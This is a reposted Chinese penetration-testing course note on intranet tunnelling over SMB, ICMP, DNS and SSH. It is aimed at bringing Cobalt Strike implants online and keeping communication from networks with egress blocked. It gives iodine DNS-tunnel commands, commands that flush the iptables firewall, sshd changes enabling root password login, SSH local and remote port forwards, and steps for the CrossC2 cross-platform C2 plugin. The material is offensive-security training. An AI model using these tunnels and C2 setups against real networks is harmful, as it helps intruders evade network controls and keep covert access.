0


第126天:内网安全-隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac

在这里插入图片描述

知识点

#知识点:1、入站规则不出网上线方案
2、出站规则不出网上线方案
3、隧道技术-SMB&ICMP&DNS&SSH
4、控制上线-Linux&Mac&IOS&Android

-连接方向:正向&反向(基础课程有讲过)
-内网穿透:解决网络控制上线&网络通讯问题
-隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)
-代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)

#系列点:1、判断什么时候用代理
2、判断什么时候用隧道
3、判断出网和不出网协议
4、如何使用代理建立节点并连接
5、如何使用隧道技术封装协议上线
6、判断哪些代理或隧道情况选择放弃

在这里插入图片描述
在这里插入图片描述

演示案例

1、隧道技术-SMB协议-判断&通讯&上线
2、隧道技术-ICMP协议-判断&通讯&上线
3、隧道技术-DNS协议-判断&通讯&上线
4、隧道技术-SSH协议-判断&通讯&上线
5、控制上线-插件-Linux&Mac&IOS&Android
1、判断出网协议
2、使用出网协议建立隧道

#SMB隧道&通讯&上线
判断:445通讯
上线:借助通讯后绑定上线
通讯:直接SMB协议通讯即可

#ICMP隧道&通讯&上线
判断:ping命令
上线:见前面课程
通讯:其他项目(icmpsh icmptunnel)
https://github.com/esrrhs/spp
https://github.com/bdamele/icmpsh
https://github.com/esrrhs/pingtunnel

#DNS隧道&通讯&上线
判断:nslookup dig1、上线环境:内网主机只出网DNS协议数据,解决上线
-域名申请及配置
-监听器创建及配置
-后门绑定监听器及生成
2、通讯环境:
内网主机只出网DNS协议数据,解决通讯
https://github.com/yarrick/iodine
判断出网:nslookup www.baidu.com
-服务器:设置密码xiaodi并创建虚拟IP及绑定域名指向
iodined -f-c-P xiaodi 192.168.0.1 ns1.xiaodi8.com -DD
设置密码xiaodi并创建虚拟IP及绑定域名指向
-客户端:连接密码xiaodi并绑定域名指向
iodine -f-M200-P xiaodi ns1.xiaodi8.com
-尝试通讯尝试连接:
ssh [email protected]

#SSH隧道&通讯
判断:ssh连接
1、上线:
由于CS无SSH协议监听器配置,无法上线
2、通讯:
由于SSH协议存在于Linux系统,跳板机必须Linux
iptables -F /* 清除所有规则 */
iptables -A INPUT -p tcp --dport22-j ACCEPT /*允许包从22端口进入*/
iptables -A OUTPUT -p tcp --sport22-m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/
iptables -A OUTPUT -p udp --dport53-j ACCEPT /* 域名解析端口,一般不开 */
iptables -A INPUT -p udp --sport53-j ACCEPT /* 域名解析端口,一般不开 */
iptables -A INPUT -s127.0.0.1 -d127.0.0.1 -j ACCEPT /*允许本机访问本机*/
iptables -A OUTPUT -s127.0.0.1 -d127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp -s0/0 --dport80-j ACCEPT /*允许所有IP访问80端口*/
iptables -A OUTPUT -p tcp --sport80-m state --state ESTABLISHED -j ACCEPT
iptables-save > /etc/sysconfig/iptables /*保存配置*/
iptables -L /* 显示iptables列表 */

开启ssh协议登录:
vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart
本地:出站封
ssh-CfNg-L1122:192.168.1.15:8080 [email protected]
curl http://127.0.0.1:1122
远程:入站封
ssh-CfNg-R1234:192.168.1.15:8080 [email protected]
curl http://127.0.0.1:1234

#控制上线-插件-Linux&Mac&IOS&Android
https://github.com/gloxec/CrossC2
面向Linux Mac IOS Android系统上线支持
1、插件使用
2、命令使用
使用参考:
https://gloxec.github.io/CrossC2/zh_cn/
目前版本只支持反向的https和正向的tcp
1、下载对应版本加载器和CNA插件
2、上传加载器文件和本地加载CNA插件
3、修改CNA插件配置路径及上传Key文件
4、使用命令或插件绑定HTTPS监听器生成
标签: 安全 ssh linux

本文转载自: https://blog.csdn.net/qq_46081990/article/details/132095060
版权归原作者 Ch4ser 所有, 如有侵权,请联系我们删除。

“第126天:内网安全-隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac”的评论:

还没有评论